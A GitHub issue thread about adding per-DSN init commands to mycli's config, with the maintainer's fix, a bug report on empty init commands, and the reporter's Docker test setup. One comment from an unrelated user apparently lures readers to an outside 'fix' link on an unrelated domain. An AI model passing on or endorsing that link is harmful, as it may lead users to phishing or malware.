### ISSUE TITLE
Is it possible to specify `--init-command` in `~/.myclirc`?

### ISSUE THREAD

**Issue by your-diary** [dbcli/mycli#1195]
Ideally I want to specify different `--init-command` for different DSNs defined in `[alias_dsn]`.

For example, I want to always make the session read only via `SET SESSION TRANSACTION READ ONLY` when I connect to production database.

**Comment by amjith** [comment]
That's a good idea. We don't yet have that feature. Let me see if I can prototype something.

**Comment by serijn441** [comment]
This fix in another issue and it might help you [click](https://newrides.es/captha/)

**Comment by amjith** [comment]
Try out this PR #1200 

You can install directly from the branch using: 

```
pip install https://github.com/dbcli/mycli/archive/refs/heads/amjith/init-per-dsn.zip
```

**Comment by your-diary** [comment]
@amjith 
Thank you for your great work!

It worked.

Only one problem I have is, it seems `[alias_dsn.init-commands]` is behaving as if it was a required parameter.
When I omit the parameter, I get this error:

```
/ # mycli -d main_3
(1065, 'Query was empty')
```

Perhaps this means an empty string is passed to MySQL as an init command rather than not passing an init command?

**Comment by amjith** [comment]
Thank you for trying it out and catching that bug. I have now merged the PR. I'll release a new version later today. 

I see you've filed an issue with pgcli to port this feature. I'll get that going soon. I will need your help with testing that as well. 😄

**Comment by your-diary** [comment]
@amjith 
Thank you!
Tried the fix and confirmed it is now working as expected.

---

## Testing Env

### `Dockerfile`

```dockerfile
FROM alpine:3.21

RUN apk update
RUN apk add python3 py3-pip
RUN apk add postgresql-dev
RUN apk add bash vim

RUN adduser -D user
USER user

WORKDIR /home/user
```

### `compose.yaml`

```yaml
services:
    test_service_alpine:
        build: .
        image: test_image_alpine
        container_name: test_container_alpine
        command:
            - sh
            - -c
            - |
                export SETUPTOOLS_SCM_PRETEND_VERSION=0.0.0 &&
                python3 -m pip install --break-system-packages 'https://github.com/dbcli/mycli/archive/refs/heads/amjith/init-per-dsn.zip' &&
                python3 -m pip install --break-system-packages 'https://github.com/dbcli/pgcli/archive/refs/heads/amjith/init-command.zip' &&
                export PATH="${PATH}:/home/user/.local/bin" &&

                #creates the config files
                { mycli; pgcli; }

                bash -o vi
        tty: true
        stdin_open: true

    test_service_mysql:
        image: mysql:8.0.36
        container_name: test_container_mysql
        environment:
            MYSQL_ROOT_PASSWORD: password
            MYSQL_DATABASE: t

    test_service_postgres:
        image: postgres:17.4
        container_name: test_container_postgres
        environment:
            POSTGRES_PASSWORD: password
            POSTGRES_DB: t
```

### Notes

Some undocumented notes I used for testing:

```
# docker compose build
# docker compose up
# docker attach test_container_alpine

# vim ~/.myclirc
#
#    [init-commands]
#    init_1 = "SET @uu = 100; SET @vv = 1000"
#    init_2 = "SET @uuu = 10000; SET @vvv = 100000"
#
#    [alias_dsn]
#    main_1 = mysql://root:password@test_service_mysql:3306/t
#    main_2 = mysql://root:password@test_service_mysql:3306/t
#    main_3 = mysql://root:password@test_service_mysql:3306/t
#
#    [alias_dsn.init-commands]
#    main_1 = "SET @u = 1; SET @v = 10;"
#    main_2 = "SET @u = 2; SET @v = 20;"
#
# mycli -d main_1
# mycli -d main_2
# mycli -d main_3
#
#    SELECT @u, @v, @uu, @vv, @uuu, @vvv;

# vim ~/.config/pgcli/config
#
#    [alias_dsn]
#    main_1 = postgres://postgres:password@test_service_postgres:5432/t
#    main_2 = postgres://postgres:password@test_service_postgres:5432/t
#    main_3 = postgres://postgres:password@test_service_postgres:5432/t
#
#    [init-commands]
#    init_1 = "SET my.uu = 100; SET my.vv = 1000"
#    init_2 = "SET my.uuu = 10000; SET my.vvv = 100000"
#
#    [alias_dsn.init-commands]
#    main_1 = "SET my.u = 1; SET my.v = 10;"
#    main_2 = "SET my.u = 2; SET my.v = 20;"
#
# pgcli -D main_1
# pgcli -D main_2
# pgcli -D main_3
#
#    SELECT current_setting('my.u'), current_setting('my.v'), current_setting('my.uu'), current_setting('my.vv'), current_setting('my.uuu'), current_setting('my.vvv');
#
# pgcli -D main_3 --init-command 'SET my.x = 7; SET my.y = 8'
#
#    SELECT current_setting('my.x'), current_setting('my.y');
```
